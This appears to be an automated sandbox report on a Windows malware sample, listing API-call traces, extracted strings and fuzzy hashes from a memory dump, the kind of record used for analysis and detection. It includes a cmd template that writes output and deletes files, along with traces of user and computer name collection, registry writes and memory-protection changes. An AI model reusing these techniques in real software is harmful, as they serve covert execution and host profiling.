Part of subcall function 049FC881: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 049FC8D1
Part of subcall function 049FC881: wcstombs.NTDLL ref: 049FC8DB
Part of subcall function 049FC881: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 049FC90F
Part of subcall function 049FC881: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,049F1CC4), ref: 049FC93B
Part of subcall function 049FC881: TerminateProcess.KERNEL32(?,000003E5), ref: 049FC951
Part of subcall function 049FC881: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,049F1CC4), ref: 049FC965
Part of subcall function 049FC881: CloseHandle.KERNEL32(?), ref: 049FC998
Part of subcall function 049FC881: CloseHandle.KERNEL32(?), ref: 049FC99D

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 04A0579E

Strings

cmd /U /C "type %s1 > %s & del %s1", xrefs: 04A0577A

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID: cmd /U /C "type %s1 > %s & del %s1"
API String ID: 1624158581-4158521270
Opcode ID: ecd69eb6702cf3ff1c0c6474d74cc997d420a15b9b28c69a389f5381cc274622
Instruction ID: c991e7e49a70520988a5fce162e20b071cde74582e6037ce22c7b1b181bca37c
Opcode Fuzzy Hash: ecd69eb6702cf3ff1c0c6474d74cc997d420a15b9b28c69a389f5381cc274622
Instruction Fuzzy Hash: 05F0A735A0152077F9211729BC09F1B6D6DEBD1B21F150130F904E51E0DA58ED13DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 04A03141, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,.dll,00000000,00000000,04A022F7,00000000,.dll,00000000,00001000,00000000,00000000,049F11C6,?,049F11C6), ref: 04A0314F
lstrlen.KERNEL32(DllRegisterServer,?,049F11C6), ref: 04A0315D
RtlAllocateHeap.NTDLL(00000000,00000022), ref: 04A03172

Strings

DllRegisterServer, xrefs: 04A03155, 04A0315A, 04A03183
.dll, xrefs: 04A0314D

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeap
String ID: .dll$DllRegisterServer
API String ID: 3070124600-294589026
Opcode ID: 693c4da5f268bd962b269a761fdf9a77211a239294bf75a07b674b11a82a55e5
Instruction ID: 23ebb3f35e7d52b6bb19854802c29dbf83d1cd6ba33ebb7e1d7321ecdd9fee55
Opcode Fuzzy Hash: 693c4da5f268bd962b269a761fdf9a77211a239294bf75a07b674b11a82a55e5
Instruction Fuzzy Hash: EFF0E9735012207BE7104B98EC4CD57BBECEF68751B050522FD4AD3260D224DD02C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 049FBE94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05A98D20), ref: 049FBE9D
Sleep.KERNEL32(0000000A), ref: 049FBEA7
HeapFree.KERNEL32(00000000), ref: 049FBED5
RtlLeaveCriticalSection.NTDLL(05A98D20), ref: 049FBEEA

Strings

0123456789ABCDEF, xrefs: 049FBEC4

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: 0123456789ABCDEF
API String ID: 58946197-2554083253
Opcode ID: 1dd74a4a34f384115a164b74dc7b70133f152f12bcd77fdcd75134af99ba702a
Instruction ID: 116fdcaebbc1976df66924a4934aba010f86ae43627b1687adaa3ebda04f574d
Opcode Fuzzy Hash: 1dd74a4a34f384115a164b74dc7b70133f152f12bcd77fdcd75134af99ba702a
Instruction Fuzzy Hash: B0F062B8200201AFFB18CF54E95AB6637EDEB68741B454469EA169B2A1D638FC42CB14

Uniqueness

Uniqueness Score: -1.00%

Function 04A0F512, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A041A5: ExpandEnvironmentStringsW.KERNEL32(75D706E0,00000000,00000000,75D706E0,?,80000001,04A0F531,00750025,80000001,?), ref: 04A041B6
Part of subcall function 04A041A5: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,80000001,04A0F531,00750025,80000001,?), ref: 04A041D3

lstrlenW.KERNEL32(00000000,00000000,75D706E0,?,00750025,80000001,?), ref: 04A0F558
lstrlenW.KERNEL32(00000008,?,00750025,80000001,?), ref: 04A0F55F
lstrlenW.KERNEL32(?,?,?,00750025,80000001,?), ref: 04A0F57B
lstrlen.KERNEL32(?,006F0070,00000000), ref: 04A0F5F5
lstrlenW.KERNEL32(?), ref: 04A0F601
wsprintfA.USER32 ref: 04A0F62F

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
String ID:
API String ID: 3384896299-0
Opcode ID: cef44909f8ebdaba65ff33b50c65fdbbc7b964a47778b2170b367b43c60b306e
Instruction ID: e1ca4dde9fcb6340f90b97fd421ca77afc7f084de872ddbadae1c09486ef4efd
Opcode Fuzzy Hash: cef44909f8ebdaba65ff33b50c65fdbbc7b964a47778b2170b367b43c60b306e
Instruction Fuzzy Hash: 4D414F72900209AFEB11AFA8ED54DAE3BBDEF48304B058065F904A7271EB75EE11DF50

Uniqueness

Uniqueness Score: -1.00%

Function 04A0E606, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 049F1AF3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 049F1AFF
Part of subcall function 049F1AF3: SetLastError.KERNEL32(000000B7,?,04A0E61A,?,?,00000000,?,?,?), ref: 049F1B10

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 04A0E63A
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04A0E712

Part of subcall function 04A08869: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04A08883
Part of subcall function 04A08869: CreateWaitableTimerA.KERNEL32(04A17160,00000003,?), ref: 04A088A0
Part of subcall function 04A08869: GetLastError.KERNEL32(?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A088B1
Part of subcall function 04A08869: GetSystemTimeAsFileTime.KERNEL32(?,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A088F1
Part of subcall function 04A08869: SetWaitableTimer.KERNEL32(00000000,04A0E66E,00000000,00000000,00000000,00000000,?,?,04A0E66E,?), ref: 04A08910
Part of subcall function 04A08869: HeapFree.KERNEL32(00000000,04A0E66E,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A08926

GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04A0E6FB
ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04A0E704

Part of subcall function 049F1AF3: CreateMutexA.KERNEL32(04A17160,00000000,?,?,04A0E61A,?,?,00000000,?,?,?), ref: 049F1B23

GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 04A0E71F

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: c05b82d0aaf4f299a3da51033002044f68b4ebbeadf84985070d950bd0aa53ff
Instruction ID: c84f4900b11aab237bfd6cc977f1bf7bc9b999c46a7186b3d03522b95a712e49
Opcode Fuzzy Hash: c05b82d0aaf4f299a3da51033002044f68b4ebbeadf84985070d950bd0aa53ff
Instruction Fuzzy Hash: A031C875A00304DFEB11AF75EC8486E7BB9FB98354B108D29E802DB2A0E675DD12DB50

Uniqueness

Uniqueness Score: -1.00%

Function 049FCE75, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 049FCE8E

Part of subcall function 049FB864: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04A0719D), ref: 049FB88A

HeapFree.KERNEL32(00000000,?,?,?,?,00000001), ref: 049FCED0
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001), ref: 049FCF22
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,?,?,?,00000001), ref: 049FCF3B

Part of subcall function 04A024C0: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04A024E1
Part of subcall function 04A024C0: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,049FCEC1,?,?,?,00000001), ref: 04A02524

GetLastError.KERNEL32 ref: 049FCF73

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: 692fc449d8f0a285476c8528f25b1d1b986643ef9cf456447a4b8fadda60fb1f
Instruction ID: 2faba309afe6751f7cbee4ba5d9dd3d680a10fdc2829e94449876fc21553721b
Opcode Fuzzy Hash: 692fc449d8f0a285476c8528f25b1d1b986643ef9cf456447a4b8fadda60fb1f
Instruction Fuzzy Hash: BA311D71A40209EBDF15DFA5DD44AAEBBB9FF08754F008065EA06A7290D734EE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 049F5373, Relevance: 7.6, APIs: 5, Instructions: 92fileCOMMON

Download Yara Rule

APIs

Part of subcall function 049F1A2E: GetSystemTimeAsFileTime.KERNEL32(?), ref: 049F1A3A
Part of subcall function 049F1A2E: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 049F1A50
Part of subcall function 049F1A2E: _snwprintf.NTDLL ref: 049F1A75
Part of subcall function 049F1A2E: CreateFileMappingW.KERNEL32(000000FF,04A17160,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 049F1A91
Part of subcall function 049F1A2E: GetLastError.KERNEL32 ref: 049F1AA3
Part of subcall function 049F1A2E: CloseHandle.KERNEL32(00000000), ref: 049F1ADB

UnmapViewOfFile.KERNEL32(?), ref: 049F53AC
CloseHandle.KERNEL32(?), ref: 049F53B5
SetEvent.KERNEL32(04A17330,?,00000000), ref: 049F542A
GetLastError.KERNEL32(04A0A2D6,00000000,00000000), ref: 049F5459
CloseHandle.KERNEL32(00000000,04A0A2D6,00000000,00000000), ref: 049F5469

Part of subcall function 049FCF94: lstrlenW.KERNEL32(00000000,00000000,00000000,74B05520,?,?,04A0FB90,?,?,049F11C6), ref: 049FCFA0
Part of subcall function 049FCF94: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,04A0FB90,?,?,049F11C6), ref: 049FCFC8
Part of subcall function 049FCF94: memset.NTDLL ref: 049FCFDA

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 1106445334-0
Opcode ID: 8119a0c09c5af95a200665a1c3276594888d12132b571711434e0388d873ca75
Instruction ID: 82ceaaa6f4343d6545c61e3f76af833bc471cb60dae2c519f0d673e8498f8f57
Opcode Fuzzy Hash: 8119a0c09c5af95a200665a1c3276594888d12132b571711434e0388d873ca75
Instruction Fuzzy Hash: 3E31F535A00314FBFB10AFA9DC44AAAB7EDFB45325F428075EA42D2191D774FD028754

Uniqueness

Uniqueness Score: -1.00%

Function 049F2DE5, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 04A09222: lstrlen.KERNEL32(00000000,00000000,?,00000000,04A0A252,?,00000000,?,?,?,?,049F10AF,?,?,00000001,?), ref: 04A0922E

RtlEnterCriticalSection.NTDLL(04A173A8), ref: 049F2E0F
RtlLeaveCriticalSection.NTDLL(04A173A8), ref: 049F2E22
GetSystemTimeAsFileTime.KERNEL32(?), ref: 049F2E33
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 049F2E9E
InterlockedIncrement.KERNEL32(04A173BC), ref: 049F2EB5

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: 433c9c94fdb739b74663cae479d7db09a3937b3015f4b53e54dd466269487243
Instruction ID: ad58a3c0169cf8fe96b5ebf6b6d77a82b878c6f2ded86c6a2e8b446775296790
Opcode Fuzzy Hash: 433c9c94fdb739b74663cae479d7db09a3937b3015f4b53e54dd466269487243
Instruction Fuzzy Hash: CA31BC35A00701AFE721CF68D848A6ABBE8FB54320F254579EA5583260D736F816CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 04A08526, Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,049F31E6), ref: 04A0853A
GetComputerNameW.KERNEL32(00000000,049F31E6), ref: 04A08556

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

GetUserNameW.ADVAPI32(7742C740,049F31E6), ref: 04A08590
GetComputerNameW.KERNEL32(049F31E6,?), ref: 04A085B3
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,7742C740,049F31E6,00000000,049F31E8,00000000,00000000,?,?,049F31E6), ref: 04A085D6

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 9bd1fef906811ea99414b70e4baa3aabf300d007d6555b23ec61e3f4b178ee56
Instruction ID: 776e4e66c27ca3afc89384fdfe65dff77fea937c217c55fdc171daf5dc8d9460
Opcode Fuzzy Hash: 9bd1fef906811ea99414b70e4baa3aabf300d007d6555b23ec61e3f4b178ee56
Instruction Fuzzy Hash: A021F776901209FFDB11DFE8D984DEEBBBCEF48304B5084AAE502E7241D634AB45DB54

Uniqueness

Uniqueness Score: -1.00%

Function 049F8F6B, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04A058BE,00000000,00000057,00000057), ref: 049F8F89
GetFileSize.KERNEL32(00000000,00000000,?,?,04A058BE,00000000,00000057,00000057,?,?,-00000007,04A0A28F,-00000007,00000000,?), ref: 049F8F99
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000001,?,?,04A058BE,00000000,00000057,00000057,?,?,-00000007,04A0A28F), ref: 049F8FC5
GetLastError.KERNEL32(?,?,04A058BE,00000000,00000057,00000057,?,?,-00000007,04A0A28F,-00000007,00000000,?,?,?,?), ref: 049F8FEA
CloseHandle.KERNEL32(000000FF,?,?,04A058BE,00000000,00000057,00000057,?,?,-00000007,04A0A28F,-00000007,00000000,?,?,?), ref: 049F8FFB

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: a1c5199946e3da7f3db9119f1e2fa555262be27efa7d0ac43a0dc37a15a13d25
Instruction ID: 2913ae0a02ec124494a7b748f99691a2717614bc65ae2bd73d10381e0252f688
Opcode Fuzzy Hash: a1c5199946e3da7f3db9119f1e2fa555262be27efa7d0ac43a0dc37a15a13d25
Instruction Fuzzy Hash: 5F11B472140215BFEB20AF68CC88EAEBBAEEB58364F054535FE15A7150D770AD4287A0

Uniqueness

Uniqueness Score: -1.00%

Function 049F8624, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 049F8635
StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 049F864E
StrTrimA.SHLWAPI(?,20000920), ref: 049F8676
StrTrimA.SHLWAPI(00000000,20000920), ref: 049F8685
HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 049F86BC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: 53971d9a34acd82b0939a5a109bda805df3731fad6470273cab411ead67a1193
Instruction ID: dedbc0aae854cec971ac352df5f6e2ed3aa15a844d31688489572c1efd952cd4
Opcode Fuzzy Hash: 53971d9a34acd82b0939a5a109bda805df3731fad6470273cab411ead67a1193
Instruction Fuzzy Hash: 66116036200215BBE711EB59DC88F9B7BACEB58794F140431FA05DB261DB75ED418790

Uniqueness

Uniqueness Score: -1.00%

Function 04A05B9F, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,?,?,?,?,?,?,?,049FA46C,74B05520,049FCF88,?), ref: 04A05BD6
VirtualProtect.KERNEL32(00000000,00000004,?,?,?,049FA46C,74B05520,049FCF88,?), ref: 04A05C06
RtlEnterCriticalSection.NTDLL(04A17380), ref: 04A05C15
RtlLeaveCriticalSection.NTDLL(04A17380), ref: 04A05C33
GetLastError.KERNEL32(?,049FA46C,74B05520,049FCF88,?), ref: 04A05C43

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: fb054a4ca471ad9720e88043d5adaab2e3a9eb5100f10e14c54fa30f6ec43a28
Instruction ID: e056ace80167c974480b6f57be8fda048bcc80943f2581eee2e290685a7050c9
Opcode Fuzzy Hash: fb054a4ca471ad9720e88043d5adaab2e3a9eb5100f10e14c54fa30f6ec43a28
Instruction Fuzzy Hash: D321F8B5A00B01AFE710CFA8D984A8ABBF8FB083147008569EA5693750D774FD44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04A099F2, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 04A09A20
GetLastError.KERNEL32 ref: 04A09A43
WaitForSingleObject.KERNEL32(?,000000FF), ref: 04A09A56
GetLastError.KERNEL32 ref: 04A09A61
HeapFree.KERNEL32(00000000,00000000), ref: 04A09AA9

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: 64c4a283257f95e1b832e63169c1539ecfb11ad699019f82e541a978d0ce3336
Instruction ID: 6edf07bd861dfadbbc73111e1d904b2cca0a2bbafca0aba6e5f39436891e91fd
Opcode Fuzzy Hash: 64c4a283257f95e1b832e63169c1539ecfb11ad699019f82e541a978d0ce3336
Instruction Fuzzy Hash: A0214DB0600204EBFB218F94E988B5F7BBDFB51314FA08518E552961E1D779FD86DB10

Uniqueness

Uniqueness Score: -1.00%

Function 04A01A14, Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 04A01A28
memcpy.NTDLL(00000000,?,00000000,00000000,00000000,?,04A00C7C,00000000,00000000,00000001,?,04A0C101,00000020,00000000,?,00000000), ref: 04A01A51
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 04A01A7A
RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,04A00C7C,00000000,00000000,00000001,?,04A0C101,00000020,00000000), ref: 04A01A9A
RegCloseKey.ADVAPI32(00000000,?,04A00C7C,00000000,00000000,00000001,?,04A0C101,00000020,00000000,?,00000000,?,00000000,00000000), ref: 04A01AA5

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Value$AllocateCloseCreateHeapmemcpy
String ID:
API String ID: 2954810647-0
Opcode ID: cc81005818ceb5dc316470a004293c894c7daf1cfdc3815e164f8dd418c302cb
Instruction ID: 8ccf3c09b7a92493884a35286f36c234bfaa4f5a4bcd0f018bd739621797384d
Opcode Fuzzy Hash: cc81005818ceb5dc316470a004293c894c7daf1cfdc3815e164f8dd418c302cb
Instruction Fuzzy Hash: 4E11A032200109BFEB129F64FD44EFA776EEB58350F808126FE01E21A0E7729D219761

Uniqueness

Uniqueness Score: -1.00%

Function 049FA7A4, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 049FA7C1
memcpy.NTDLL(?,?,00000009), ref: 049FA7E3
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 049FA7FB
lstrlenW.KERNEL32(?,00000001,?), ref: 049FA81B
HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 049FA840

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: c3d72953e4296e363b31ca5b4125f5ca07f6054277165e239768d1875d2e7bfb
Instruction ID: d1415110b5529b06af3a9a3f0824757584a8616b5374fb178cd6918ad8350af8
Opcode Fuzzy Hash: c3d72953e4296e363b31ca5b4125f5ca07f6054277165e239768d1875d2e7bfb
Instruction Fuzzy Hash: 02115135D00208BBEB119F94DC49FDE7FB8EB58750F048061FA19E6290D674A649CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A0A99E, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000008,04A00C16,00000000,00000000,00000000,00000020,00000000,?,04A0C101,00000020,00000000,?,00000000), ref: 04A0A9A8

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

lstrcpy.KERNEL32(00000000,00000000), ref: 04A0A9CC
StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,04A0C101,00000020,00000000,?,00000000,?,00000000,00000000), ref: 04A0A9D3
lstrcpy.KERNEL32(00000000,4C003436), ref: 04A0AA1B
lstrcat.KERNEL32(00000000,?), ref: 04A0AA2A

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: 3b178cbff9e93b1331f6aa13f4b0c1c378a36e98c8813103272f4474526fb51e
Instruction ID: 573b7a02f99ff380ded15d9bf46a589e42ed35a13b004a400560337e55ad1ab8
Opcode Fuzzy Hash: 3b178cbff9e93b1331f6aa13f4b0c1c378a36e98c8813103272f4474526fb51e
Instruction Fuzzy Hash: 78118236200346ABE721DF65ED88F2B7BECEBA4355F458128F985C3190DB28EC46C721

Uniqueness

Uniqueness Score: -1.00%

Function 049F2974, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04A09222: lstrlen.KERNEL32(00000000,00000000,?,00000000,04A0A252,?,00000000,?,?,?,?,049F10AF,?,?,00000001,?), ref: 04A0922E

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 049F299D
memcpy.NTDLL(00000000,?,?), ref: 049F29B0
RtlEnterCriticalSection.NTDLL(04A173A8), ref: 049F29C1
RtlLeaveCriticalSection.NTDLL(04A173A8), ref: 049F29D6
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 049F2A0E

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: 847a85c42336a16c444854d8a03f77421f56140231dcc3ed42202b2541ef5ffd
Instruction ID: 7b74c3ef9f36cc0484639e25dfab7dd923670b7a7b56b827189bfefc9a6afbb4
Opcode Fuzzy Hash: 847a85c42336a16c444854d8a03f77421f56140231dcc3ed42202b2541ef5ffd
Instruction Fuzzy Hash: 6C11E576100210BFE7219F14EC44D6BBBACFB95361B05417AFD15932A0D636AC02CB61

Uniqueness

Uniqueness Score: -1.00%

Function 049F761A, Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,00000008,?,0000EA60,00000000,00000000,00000000,?,049FCDE0,00000000,?,00000000,?,00000057,?), ref: 049F7659
ResetEvent.KERNEL32(?,?,049FCDE0,00000000,?,00000000,?,00000057,?), ref: 049F765E
GetLastError.KERNEL32(049FCDE0,00000000,?,00000000,?,00000057,?), ref: 049F7679
GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,049FCDE0,00000000,?,00000000,?,00000057,?), ref: 049F76A8

Part of subcall function 049FF8F0: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,049F7633,00000000,00000000,00000004,00000000,?,049FCDE0,00000000,?,00000000), ref: 049FF8FC
Part of subcall function 049FF8F0: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,049F7633,00000000,00000000,00000004,00000000,?,049FCDE0,00000000), ref: 049FF95A
Part of subcall function 049FF8F0: lstrcpy.KERNEL32(00000000,00000000), ref: 049FF96A

SetEvent.KERNEL32(?,049FCDE0,00000000,?,00000000,?,00000057,?), ref: 049F769A

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 34656fe0647314469b12d2aa166bbeacb313731c813285803e1d433750a45e6b
Instruction ID: 448b344bb19bbf1759411e07998f18fe0cbd25f823b6a839826d3af3a720a3ab
Opcode Fuzzy Hash: 34656fe0647314469b12d2aa166bbeacb313731c813285803e1d433750a45e6b
Instruction Fuzzy Hash: 5C113C31100609AFFF21AFA9DC44A9B7BB9EF48364F104675FA12950A0D735EC61DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04A108F1, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 04A10911
GetModuleHandleA.KERNEL32 ref: 04A1091F
LoadLibraryExW.KERNEL32(?,?,?), ref: 04A1092C
GetModuleHandleA.KERNEL32 ref: 04A10943
GetModuleHandleA.KERNEL32 ref: 04A1094F

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$LibraryLoad
String ID:
API String ID: 1178273743-0
Opcode ID: e61a954749c6b133418a63462bda479336b96bb514354d23a54d2c0a6f9a99bd
Instruction ID: ad43de2d0b330561642d68c2a52a78fa7b9f51b8c8c5df4ea6a68458406faf15
Opcode Fuzzy Hash: e61a954749c6b133418a63462bda479336b96bb514354d23a54d2c0a6f9a99bd
Instruction Fuzzy Hash: 760181312053069FBF015F6AEC50A5A3BA9FF643607044036FE14C2170DB75EC22DB94

Uniqueness

Uniqueness Score: -1.00%

Function 049F8EA4, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(04A17380), ref: 049F8EAF
RtlLeaveCriticalSection.NTDLL(04A17380), ref: 049F8EC0
VirtualProtect.KERNEL32(00000001,00000004,00000040,0000007F,?,?,049FD59F,00000000,04A170E8,04A173A8,04A0153A,00000003,?,?,049FDFAA,00000000), ref: 049F8ED7
VirtualProtect.KERNEL32(00000001,00000004,0000007F,0000007F,?,?,049FD59F,00000000,04A170E8,04A173A8,04A0153A,00000003,?,?,049FDFAA,00000000), ref: 049F8EF1
GetLastError.KERNEL32(?,?,049FD59F,00000000,04A170E8,04A173A8,04A0153A,00000003,?,?,049FDFAA,00000000,?,04A170E8), ref: 049F8EFE

Memory Dump Source

